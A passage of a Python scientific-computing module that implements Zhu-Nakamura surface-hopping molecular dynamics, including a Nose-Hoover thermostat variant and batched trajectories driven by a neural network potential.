            upper_state (int): index of upper electronic state at crossing
Returns:
None
"""
if self.explicit_diabat:
if self.diabat_ens is None:
raise Exception("Diabatic quantities haven't been updated")
self.diabatic_coupling = abs(self.diabat_ens[lower_state,
upper_state])
state_array = np.array([lower_state, upper_state])
self.diabatic_forces = self.diabat_forces[state_array, :]
else:
d_forces, d_coupling = self.get_diabat_engrads(
lower_state=lower_state,
upper_state=upper_state)
self.diabatic_forces = d_forces
self.diabatic_coupling = d_coupling
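        # Mass-weighted Zhu parameters computed from the diabatic forces F1, F2:
        #   difference = sqrt( sum_i |F2_i - F1_i|^2 / m_i )
        #   product    = sqrt( | sum_i F1_i . F2_i / m_i | )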
# update Zhu difference parameter
norm_vec = mol_norm(self.diabatic_forces[1] - self.diabatic_forces[0])
self.zhu_difference = np.sum(norm_vec ** 2 / self.get_masses()) ** 0.5
# update Zhu product parameter and the Zhu sign parameter
prods = self.diabatic_forces[0] * self.diabatic_forces[1]
inner = np.sum(prods / self.get_masses().reshape(-1, 1))
self.zhu_product = abs(inner) ** 0.5
self.zhu_sign = int(np.sign(inner))
# get parallel component of velocity and the associated KE
# First normalize s-vector to give n-vector
s = (self.diabatic_forces[1] - self.diabatic_forces[0]
) / self.get_masses().reshape(-1, 1) ** 0.5
self.n_vector = s / mol_norm(s).reshape(-1, 1)
# Then get ke's
self.v_parallel = mol_dot(self.velocity_list[-2], self.n_vector)
self.ke_parallel = np.sum(
self.get_masses() * (self.v_parallel ** 2) / 2)
self.ke = np.sum(self.get_masses() *
mol_norm(self.velocity_list[-2]) ** 2 / 2)
def rescale_v(self, old_surf, new_surf):
"""
Re-scale the velocity after a hop.
Args:
old_surf (int): old surface
new_surf (int): new surface
Returns:
            "err" (str) if the rescaling fails (insufficient kinetic energy or NaNs),
            otherwise None
"""
# the energy to consider is actually the energy at the crossing point,
# which is not the current energy but the energy one step before
energy = self.energy_list[-2]
# the component of v parallel to the hopping direction
v_par_vec = self.n_vector * (self.v_parallel).reshape(-1, 1)
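        # Rescale the parallel velocity component so that total energy is conserved
        # across the hop: the new parallel kinetic energy must equal
        # E(old surface) + KE_parallel - E(new surface).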
# the scaling factor for the velocities
scale_arg = (((energy[old_surf] + (self.ke_parallel)) -
energy[new_surf]) / (self.ke_parallel))
if scale_arg < 0 or np.isnan(scale_arg):
return "err"
scale = scale_arg ** 0.5
velocities = scale * v_par_vec + \
(self.velocity_list[-2] - v_par_vec)
if np.isnan(velocities).any():
return "err"
self.velocities = velocities
def update_probabilities(self):
"""
Update the Zhu a, b and p probabilities.
"""
hopping_probabilities = []
at_crossing, new_surfs = self.check_crossing()
# if we're not at a crossing, then the hopping probabilities
# shouldn't be considered
if not at_crossing:
self.hopping_probabilities = hopping_probabilities
return
# if the molecule's exploded then move on
if ('nan' in self.positions.astype("str")
or 'nan' in self.forces.astype("str")):
self.hopping_probabilities = hopping_probabilities
return
for new_surf in new_surfs:
# get the upper and lower state by sorting the current
# surface and the new one
lower_state, upper_state = sorted((self.surf, new_surf))
# If requested, only consider a hop if the gap is below
# a certain value. Don't just get the gap as 2 * the
# diabatic coupling, because that's not the case if
# we use explicit diabatic states
gap = abs(self.energy_list[-2][upper_state].item()
- self.energy_list[-2][lower_state].item())
if gap > self.max_gap_hop:
hopping_probabilities.append({"zhu_a": 0,
"zhu_b": 0,
"zhu_p": 0,
"new_surf": new_surf})
continue
# another place it might fail with nan
try:
self.update_diabatic_quants(lower_state, upper_state)
except ValueError:
return
# use context manager to ignore any divide by 0's
with np.errstate(divide='ignore', invalid='ignore'):
# calculate the zhu a parameter
a_numerator = (HBAR ** 2 / 2 * self.zhu_product
* self.zhu_difference)
a_denominator = (2 * self.diabatic_coupling) ** 3
zhu_a = np.nan_to_num(
np.divide(a_numerator, a_denominator) ** 0.5)
# calculate the zhu b parameter, starting with Et and Ex
et = self.ke_parallel + self.energy_list[-2][self.surf].item()
ex = (self.energy_list[-2][upper_state].item() +
self.energy_list[-2][lower_state].item()) / 2
b_numerator = (et - ex) * self.zhu_difference / \
self.zhu_product
b_denominator = 2 * self.diabatic_coupling
zhu_b = np.nan_to_num(
np.divide(b_numerator, b_denominator) ** 0.5)
# calculating the hopping probability
zhu_p = np.nan_to_num(
np.exp(-np.pi / 4 / zhu_a *
(2 / (zhu_b ** 2 +
(abs((zhu_b ** 4) + (self.zhu_sign) * 1.0))
** 0.5)) ** 0.5))
# add this info to the list of hopping probabilities
hopping_probabilities.append({"zhu_a": zhu_a,
"zhu_b": zhu_b,
"zhu_p": zhu_p,
"new_surf": new_surf})
self.hopping_probabilities = hopping_probabilities
def should_hop(self, zhu_p):
"""
        Decide whether or not to hop by comparing the hopping probability to a
        uniform random number.
        Args:
            zhu_p (float): Zhu-Nakamura hopping probability
Returns:
will_hop (bool): whether or not to hop
"""
rnd = np.random.rand()
will_hop = (zhu_p > rnd)
return will_hop
def hop(self, new_surf):
"""
Hop from the current surface to a new surface at an avoided crossing.
Args:
new_surf (int): index of new surface
Returns:
            "err" (str) if the velocity rescaling fails, otherwise None
"""
# re-scale the velocity
out = self.rescale_v(old_surf=self.surf, new_surf=new_surf)
if out == "err":
return out
# change the surface
self.surf = new_surf
# reset to the second last position for positions, energies, and forces
self.positions = self.position_list[-2]
self.energies = self.energy_list[-2]
self.forces = self.force_list[-2]
# set the frame to be in the trajectory, but the previous
# two frames to be out of the trajectory
self.in_trj = True
self.in_trj_list[-2] = False
self.in_trj_list[-3] = False
# add a new empty hopping probability list
self.hopping_probabilities = []
self.time = self.time - self.dt
self.modify_save()
def full_step(self,
compute_internal_forces=True,
do_log=True):
"""
        Take a full time step: optionally take an MD step on the current surface, then
        update the hopping probabilities and attempt any hops at avoided crossings.
        Args:
            compute_internal_forces (bool): whether to take the MD step here (set to
                False when forces and energies are supplied externally, e.g. by
                BatchedZhuNakamura)
            do_log (bool): whether to log hop attempts
"""
if compute_internal_forces:
self.md_step()
# update the hopping probabilities
self.update_probabilities()
# randomly order the self.hopping_probabilities list.
# If, for some reason, two sets of states
# are both at an avoided crossing, then we'll first
# try to hop between the first set of states.
# If this fails then we'll try to hop between the second
# set of states. To avoid biasing in
# the direction of one hop vs. another, we randomly shuffle
# the order of self.hopping_probabilities
# each time.
random.shuffle(self.hopping_probabilities)
# loop through sets of states to hop between
for probability_dic in self.hopping_probabilities:
zhu_p = probability_dic["zhu_p"]
new_surf = probability_dic["new_surf"]
old_surf = copy.deepcopy(self.surf)
if do_log:
self.log(f"Attempting hop from state {old_surf} to state "
f"{new_surf}. Probability is {zhu_p}.")
# decide whether or not to hop based on Zhu a, b, and p
will_hop = self.should_hop(zhu_p)
# hop and end loop if will_hop == True
if will_hop:
out = self.hop(new_surf)
if out != "err":
if do_log:
self.log(f"Hopped from state {old_surf} "
f"to state {new_surf}.")
return
else:
if do_log:
self.log(f"Did not hop from state {old_surf} "
f"to state {new_surf}.")
def run(self):
        # save initial conditions
self.update_energies()
self.update_forces()
self.save()
time_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
rel_ens = ", ".join(((self.energies - self.energies[0]) * 27.2
).reshape(-1).astype("str").tolist())
self.log(f"Beginning surface hopping at {time_str}.")
self.log(f"Relative energies are {rel_ens} eV")
while self.time < self.max_time:
self.step()
self.save()
# self.output_to_json()
time_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.log(f"Surface hopping completed normally at {time_str}.")
class NoseHooverZN(ZhuNakamuraDynamics):
def __init__(self,
temperature,
ttime,
**kwargs):
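        """
        Zhu-Nakamura dynamics coupled to a Nose-Hoover thermostat.
        Args:
            temperature (float): target temperature in Kelvin (converted to atomic
                units via KB_AU)
            ttime (float): thermostat coupling strength in units of the timestep;
                it sets the effective thermostat mass Q = n_dof * kT * (ttime * dt) ** 2
            kwargs: arguments passed through to ZhuNakamuraDynamics
        """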
ZhuNakamuraDynamics.__init__(self, **kwargs)
self.zeta = 0.0
self.ttime = ttime
self.temp = temperature * KB_AU
n_atom = len(self.atoms)
self.n_dof = (3.0 * n_atom - 6)
        self.target_ekin = 0.5 * self.n_dof * self.temp
self.Q = self.n_dof * self.temp * (self.ttime * self.dt) ** 2
def get_kinetic_energy(self,
vel=None):
if vel is None:
vel = self.velocities
ke = np.sum(self.get_masses() * mol_norm(vel) ** 2 / 2)
return ke
def position_step(self):
# get current acceleration and velocity
accel = self.get_accel()
self.old_accel = accel
delta_pos = (self.velocities * self.dt
+ (accel - self.zeta * self.velocities)
* 0.5 * self.dt ** 2) * BOHR_RADIUS
self.positions = self.positions + delta_pos
def velocity_step(self, do_log=True):
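        """
        Velocity update for the Nose-Hoover thermostat: take half steps in the
        velocities and in the friction coefficient zeta, then finish the velocity
        step with the new accelerations, before doing the usual Zhu-Nakamura
        bookkeeping (surface, time, logging).
        Args:
            do_log (bool): whether to log the completed step
        """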
# NVT stuff
# ke before half velocity step
ke_0 = self.get_kinetic_energy()
# make a half step in velocity
# (don't update v yet because it will mess up the "append to
# velocity list" part of the velocity setter)
v_half = (self.velocities + 0.5 * self.dt *
(self.old_accel - self.zeta * self.velocities))
# make a half step in zeta
z_half = (self.zeta + 0.5 * self.dt /
                  self.Q * (ke_0 - self.target_ekin))
# make another half step in zeta
ke_1 = self.get_kinetic_energy(v_half)
self.zeta = (z_half + 0.5 * self.dt /
                     self.Q * (ke_1 - self.target_ekin))
# make another half step in velocity
new_accel = self.get_accel()
self.velocities = ((v_half + 0.5 * self.dt * new_accel) /
(1 + 0.5 * self.dt * self.zeta))
# temp = self.get_kinetic_energy() / (1 / 2 * self.n_dof) / KB_AU
# print("Temperature = %.2f K" % temp)
# ZN stuff
# assume the current frame is in the trajectory until
# finding out otherwise
self.in_trj = True
# update surf (which also appends to surf_list)
self.surf = self.surf
self.time = self.time + self.dt
step = int(self.time/self.dt)
rel_ens = ", ".join(((self.energies - self.energies[0]) * 27.2
).reshape(-1).astype("str").tolist())
if do_log:
self.log(f"Completed step {step}. Currently in state {self.surf}.")
self.log(f"Relative energies are {rel_ens} eV")
class BatchedZhuNakamura:
"""
    A class for running several Zhu Nakamura trajectories at once. This is done by taking a
    position step for each trajectory, combining all the xyz's into a dataset and batching it
    for the network, de-batching to put the forces and energies back in the trajectories, and
    then completing the velocity step and any hops for each trajectory.
Attributes:
num_trj (int): number of concurrent trajectories
zhu_trjs (list): list of ZhuNakamura instances
max_time (float): maximum simulation time
energy_keys (list): names of outputted energies
grad_keys (list): names of outputted gradient keys
props (dict): dataset properties
nbr_update_period (float): how often to update the neighbor list
device (int): GPU device
model (torch.nn): neural network model
batch_size (int): size of batches to be fed into network
        cutoff (float): neighbor list cutoff used by the neural network model
cutoff_skin (float): extra amount of distance to add to cutoff
to deal with atoms becoming neighbors between neighbor list
updates
"""
def __init__(self,
atoms_list,
props,
batched_params,
zhu_params,
modelparams=None,
model_type=None,
needs_angles=False):
"""
Initialize.
Args:
atoms_list (list): list of ASE atom objects
props (dict): dictionary of dataset props
batched_params (dict): parameters related to the batching process
zhu_params (dict): parameters related to Zhu Nakamura
"""
self.num_trj = batched_params["num_trj"]
self.zhu_trjs = self.make_zhu_trjs(atoms_list, zhu_params)
self.explicit_diabat = zhu_params.get("explicit_diabat",
DEF_EXPLICIT_DIABAT)
self.max_time = self.zhu_trjs[0].max_time
self.energy_keys = [f"energy_{i}" for i in
range(self.zhu_trjs[0].num_states)]
self.grad_keys = [f"{key}_grad" for key in self.energy_keys]
self.props = self.duplicate_props(props)
self.nbr_update_period = batched_params["nbr_update_period"]
self.device = batched_params["device"]
self.model = load_model(batched_params["weight_path"],
params=modelparams,
model_type=model_type)
self.model.eval()
self.model.to(self.device)
self.batch_size = batched_params["batch_size"]
self.cutoff = batched_params["cutoff"]
self.cutoff_skin = batched_params.get("cutoff_skin",
DEFAULT_SKIN)
self.needs_angles = needs_angles
# for saving at intervals
self.save_period = min([trj.save_period for trj in
self.zhu_trjs])
self.dt = min([trj.dt for trj in self.zhu_trjs])
def make_zhu_trjs(self, atoms_list, zhu_params):
"""
Instantiate the Zhu Nakamura objects.
Args:
atoms_list (list): list of ASE atom objects
zhu_params (dict): parameters related to Zhu Nakamura
Returns:
zhu_trjs (list): list of ZhuNakamura trajectory objects
"""
assert len(atoms_list) == self.num_trj
# base names for the output and log files
base_out_name = zhu_params.get("out_file", OUT_FILE).split(".csv")[0]
base_log_name = zhu_params.get("log_file", LOG_FILE).split(".log")[0]
zhu_trjs = []
for i, atoms in enumerate(atoms_list):
these_params = copy.deepcopy(zhu_params)
these_params["out_file"] = f"{base_out_name}_{i}.csv"
these_params["log_file"] = f"{base_log_name}_{i}.log"
thermostat = these_params.get("thermostat", "none").lower()
class_dic = {"none": ZhuNakamuraDynamics,
"nosehoover": NoseHooverZN}
zn_class = class_dic[thermostat]
zhu_trjs.append(zn_class(atoms=atoms, **these_params))
return zhu_trjs
def duplicate_props(self, props):
"""
Duplicate properties, once for each trajectory.
Args:
props (dict): dictionary of dataset props
Returns:
new_props (dict): dictionary updated for each trajectory
"""
new_props = dict()
for key, val in props.items():
if isinstance(val, list):
new_props[key] = val * self.num_trj
elif hasattr(val, "tolist"):
typ = type(val)
new_props[key] = typ((val.tolist()) * self.num_trj)
else:
                raise Exception(f"Don't know how to duplicate property {key} "
                                f"of type {type(val)}")
new_props.update({key: None for key in
[*self.energy_keys, *self.grad_keys]})
new_props["num_atoms"] = new_props["num_atoms"].long()
return new_props
def update_energies_forces(self,
trjs,
get_new_neighbors):
"""
Update the energies and forces for the molecules of each trajectory.
Args:
trjs (list): list of trajectories
get_new_neighbors (bool): whether or not to update the neighbor list
Returns:
None
"""
nxyz_data = [torch.Tensor(atoms_to_nxyz(trj.atoms)) for trj in trjs]
props = {"nxyz": nxyz_data,
"nbr_list": self.props["nbr_list"],
"num_atoms": self.props['num_atoms']}
dataset = Dataset(props=props,
units='kcal/mol',
check_props=False)
if get_new_neighbors:
# can stack the nxyz's and generate the neighbor list
# accordingly because all geoms correspond to the
# same molecule
nbrs = single_spec_nbrs(dset=dataset,
cutoff=(self.cutoff +
self.cutoff_skin),
device=self.device,
directed=True)
dataset.props['nbr_list'] = nbrs
# dataset.generate_neighbor_list(self.cutoff)
if self.needs_angles:
dataset.generate_angle_list()
dataset.props["num_atoms"] = dataset.props["num_atoms"].long()
self.props = dataset.props
loader = DataLoader(dataset,
batch_size=self.batch_size,
collate_fn=collate_dicts)
for i, batch in enumerate(loader):
batch = batch_to(batch, self.device)
results = self.model(batch)
results = batch_detach(results)
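            # the network returns gradients concatenated over all geometries in the
            # batch; split them per geometry using the atom counts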
for key in self.grad_keys:
N = batch["num_atoms"].cpu().detach().numpy().tolist()
results[key] = torch.split(results[key], N)
current_trj = i * self.batch_size
for j, trj in enumerate(trjs[current_trj:
current_trj + self.batch_size]):
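                # convert the network's kcal/mol-based energies and gradients
                # to atomic units before handing them back to the trajectory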
energies = []
forces = []
for key in self.energy_keys:
energy = (results[key][j].item())*KCAL_TO_AU["energy"]
force = (
(-results[key + "_grad"][j]).detach(
).cpu().numpy()
) * KCAL_TO_AU["energy"]*KCAL_TO_AU["_grad"]
energies.append(energy)
forces.append(force)
trj.energies = np.array(energies)
trj.forces = np.array(forces)
def add_diabat_forces(self):
diabat_trjs = []
diabat_idx = []
for i, trj in enumerate(self.zhu_trjs):
at_crossing, _ = trj.check_crossing()
if at_crossing:
diabat_trjs.append(trj)
diabat_idx.append(i)
else:
# reset to None to catch any silent errors of
# reusing the old diabatic forces
trj.diabat_ens = None
trj.diabat_forces = None
# create a dataset and limit to only the trajectories you
# care about
dataset = Dataset(props=self.props.copy(),
units='kcal/mol',
check_props=False)
diabat_idx = torch.LongTensor(diabat_idx)
dataset.change_idx(diabat_idx)
# get positions at previous time step for all trajectories at
# crossings
xyz_data = [trj.position_list[-2] for trj in diabat_trjs]
for i, xyz in enumerate(xyz_data):
z_arr = diabat_trjs[i].atoms.get_atomic_numbers()
nxyz = np.concatenate([z_arr.reshape(-1, 1), xyz], axis=-1)
dataset.props['nxyz'][i] = torch.Tensor(nxyz)
# technically not generating neighbors here isn't totally consistent,
# because it's possible that neighbors were generated at the subsequent
# step in `update_energies_forces`, and you're using those neighbors
# now, whereas they really weren't used in the original calculation of
# the forces at this step. But assuming the neighbor list is getting
# updated frequently enough that this doesn't affect the engrads too
# much, we shouldn't have to worry about it
loader = DataLoader(dataset,
batch_size=self.batch_size,
collate_fn=collate_dicts)
for i, batch in enumerate(loader):
batch = batch_to(batch, self.device)
diabat_keys = np.array(self.model.diabatic_readout.diabat_keys)
diag_diabats = diabat_keys.diagonal()
extra_grads = [f"{key}_grad" for key in diag_diabats]
results = batch_detach(self.model(batch, extra_grads=extra_grads))
for key in [*self.grad_keys, *extra_grads]:
N = batch["num_atoms"].cpu().detach().numpy().tolist()
results[key] = torch.split(results[key], N)
current_trj = i * self.batch_size
end_trj = current_trj + self.batch_size
for j, trj in enumerate(diabat_trjs[current_trj: end_trj]):
num_states = diabat_keys.shape[0]
# store the diabatic energies as a matrix
diabat_ens = np.zeros((num_states, num_states))
# only store the diagonal diabatic forces
diabat_forces = np.zeros((num_states, N[j], 3))
for l in range(num_states):
for m in range(num_states):
d_key = diabat_keys[l, m]
diabat_en_kcal = results[d_key][j].item()
diabat_en_au = diabat_en_kcal * KCAL_TO_AU["energy"]
diabat_ens[l, m] = diabat_en_au
if l == m:
diabat_force_kcal = -(results[f"{d_key}_grad"][j]
.detach().cpu().numpy())
diabat_force_au = (diabat_force_kcal
* KCAL_TO_AU["energy"]
* KCAL_TO_AU["_grad"])
diabat_forces[l, :] = diabat_force_au
trj.diabat_ens = diabat_ens
trj.diabat_forces = diabat_forces
def single_pos_step(self, i):
self.zhu_trjs[i].position_step()
def save_par(self, i):
trj = self.zhu_trjs[i]
# trj.velocity_step()
# trj.full_step(compute_internal_forces=False)
# print(trj.time)
if trj.time < self.max_time:
trj.save()
def step(self,
get_new_neighbors,
do_save=True):
"""
        Take a step for each trajectory.
        Args:
            get_new_neighbors (bool): whether to update the neighbor list
            do_save (bool): whether to log and save this step
Returns:
None
"""
for trj in self.zhu_trjs:
# take a position step based on previous energies and forces
trj.position_step()
# run position steps in parallel - for some reason a single process
# is the most efficient and is still much faster than a for-loop
# when it comes to saving csvs
# pool.imap_unordered(self.single_pos_step, range(num_trjs))
# update the energies and forces
self.update_energies_forces(trjs=self.zhu_trjs,
get_new_neighbors=get_new_neighbors)
for trj in self.zhu_trjs:
# take a velocity step
trj.velocity_step(do_log=do_save)
if self.explicit_diabat:
self.add_diabat_forces()
for trj in self.zhu_trjs:
# take a "full_step" with compute_internal_forces=False,
# which just amounts to checking if you're at a crossing and
# potentially hopping
trj.full_step(compute_internal_forces=False,
do_log=do_save)
for trj in self.zhu_trjs:
if trj.time < self.max_time and do_save:
trj.save()
# pool = Pool(processes=1)
# num_trjs = len(self.zhu_trjs)
# pool.imap_unordered(self.save_par, range(1))
# pool.close()
# multi_pool = Pool(processes=5)
# multi_pool.map(self.save_par, range(1))
# multi_pool.close()
# multi_pool.join()
# q = mp.Queue()
# p = mp.Process(target=self.save_par, args=range(1))
# p.start()
# print(q.get())
# p.join()
def run(self):
"""
Run all the trajectories
"""
# initial energy and force calculation to get things started
self.update_energies_forces(trjs=self.zhu_trjs,
get_new_neighbors=True)
complete = False
num_steps = 0
save_steps = int(self.save_period / (self.dt / FS_TO_AU))
while not complete:
get_new_neighbors = np.mod(num_steps,
self.nbr_update_period) == 0
do_save = np.mod(num_steps, save_steps) == 0
self.step(get_new_neighbors=get_new_neighbors,
do_save=do_save)
if do_save:
print(f"Completed step {num_steps}")
complete = all([trj.time >= self.max_time
for trj in self.zhu_trjs])
num_steps += 1
print("Neural ZN terminated normally.")
# for trj in self.zhu_trjs:
# trj.output_to_json()
class CombinedZhuNakamura:
"""
Class for combining an initial ground state MD simulation with BatchedZhuNakamura.
Attributes:
        ground_dynamics: dynamics object used to run the ground-state trajectory
ground_savefile (str) : name of output file from ground state trajectory
equil_time (float): length of time to let the system equilibrate on the ground state
before sampling geometries for a subsequent Zhu-Nakamura run
num_trj (int): number of excited state trajectories to run in parallel
zhu_params (dict): parameters for Zhu-Nakamura run
batched_params (dict): parameters for batching Zhu Nakamura
props (dict): dataset props
ground_params (dict): parameters for ground state MD
"""
def __init__(self,
atoms,
zhu_params,
batched_params,
ground_params,
props,
modelparams=None,
model_type=None,
needs_angles=False):
"""
Initialize:
atoms: ase Atoms objects
zhu_params: see above
batched_params: see above
ground_params: see above
props: see above
"""
ase_ground_params = copy.deepcopy(ground_params)
# the Dynamics classes we've made automatically convert to ASE units
# ase_ground_params["max_time"] *= FS_TO_ASE
# ase_ground_params["timestep"] *= FS_TO_ASE
ase_ground_params["trajectory"] = ground_params.get("savefile")
# ase_ground_params["temperature"] = ground_params["temperature"]*KB_EV
self.nms = ase_ground_params.get("nms")
if not self.nms:
method = METHOD_DIC[ase_ground_params["thermostat"]]
self.ground_dynamics = method(atoms, **ase_ground_params)
self.ground_savefile = ground_params.get("savefile")
self.equil_time = ground_params.get("equil_time")
self.num_trj = batched_params["num_trj"]
self.zhu_params = zhu_params
self.batched_params = batched_params
self.props = props
self.ground_params = ground_params
self.modelparams = modelparams
self.model_type = model_type
self.needs_angles = needs_angles
def sample_ground_geoms(self):
"""
Run a ground state trajectory and extract starting geometries and velocities for each
Zhu Nakamura trajectory.
Args:
None
Returns:
            actual_states (list): list of ase.Atoms objects sampled from the equilibrated
                ground-state trajectory (or from normal-mode sampling if `nms` is set).
"""
if self.nms:
temp = self.ground_params.get(
"temperature", self.ground_params.get("T_init"))
actual_states = nms_sample(
params=self.ground_params,
classical=self.ground_params["classical"],
num_samples=self.num_trj,
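                # kT in Hartree: 25.7 meV at 300 K, scaled to the requested temperature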
kt=25.7 / 1000 / 27.2 * temp / 300,
hb=1)
return actual_states
steps = int(self.ground_params["max_time"] /
self.ground_params["timestep"])
equil_steps = int(self.ground_params["equil_time"] /
self.ground_params["timestep"])
self.ground_dynamics.run(steps=steps)
trj = Trajectory(self.ground_savefile)
loginterval = self.ground_params.get("loginterval", 1)
logged_equil = int(equil_steps / loginterval)
possible_states = [trj[index] for index in
range(logged_equil, len(trj))]
random_indices = random.sample(range(len(possible_states)),
self.num_trj)
actual_states = [possible_states[index] for index in random_indices]
return actual_states
def run(self):
"""
Run a ground state trajectory followed by a set of parallel Zhu Nakamura trajectories.
"""
set_start_method('spawn')
atoms_list = self.sample_ground_geoms()
# print(atoms_list[0].get_kinetic_energy())
# print(atoms_list[0].get_positions())
# print(atoms_list[0].get_velocities())
# mp.set_start_method('spawn')
batched_zn = BatchedZhuNakamura(atoms_list=atoms_list,
props=self.props,
batched_params=self.batched_params,
zhu_params=self.zhu_params,
modelparams=self.modelparams,
model_type=self.model_type,
needs_angles=self.needs_angles)
batched_zn.run()
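# ---------------------------------------------------------------------------
# Minimal usage sketch (commented out; hypothetical). It shows how the classes
# above might be driven from a script. The file names, parameter values, and
# the exact keys expected in `zhu_params`, `batched_params`, and
# `ground_params` are illustrative assumptions -- the authoritative keys are
# those consumed by the __init__ methods earlier in this module and by the
# trained model loaded from `weight_path`.
# ---------------------------------------------------------------------------
# if __name__ == "__main__":
#     from ase.io import read
#
#     atoms = read("geom.xyz")                      # hypothetical starting geometry
#     props = {...}                                 # dataset props for the model
#
#     zhu_params = {"out_file": "zn.csv",
#                   "log_file": "zn.log",
#                   "thermostat": "none"}           # or "nosehoover"
#     batched_params = {"num_trj": 8,
#                       "nbr_update_period": 20,
#                       "device": 0,
#                       "weight_path": "model_dir", # hypothetical path
#                       "batch_size": 8,
#                       "cutoff": 5.0}
#     ground_params = {"thermostat": "nosehoover",  # must be a key of METHOD_DIC
#                      "max_time": 1000.0,
#                      "timestep": 0.5,
#                      "equil_time": 500.0,
#                      "savefile": "ground.traj",
#                      "loginterval": 10,
#                      "temperature": 300.0}
#
#     combined = CombinedZhuNakamura(atoms=atoms,
#                                    zhu_params=zhu_params,
#                                    batched_params=batched_params,
#                                    ground_params=ground_params,
#                                    props=props)
#     combined.run()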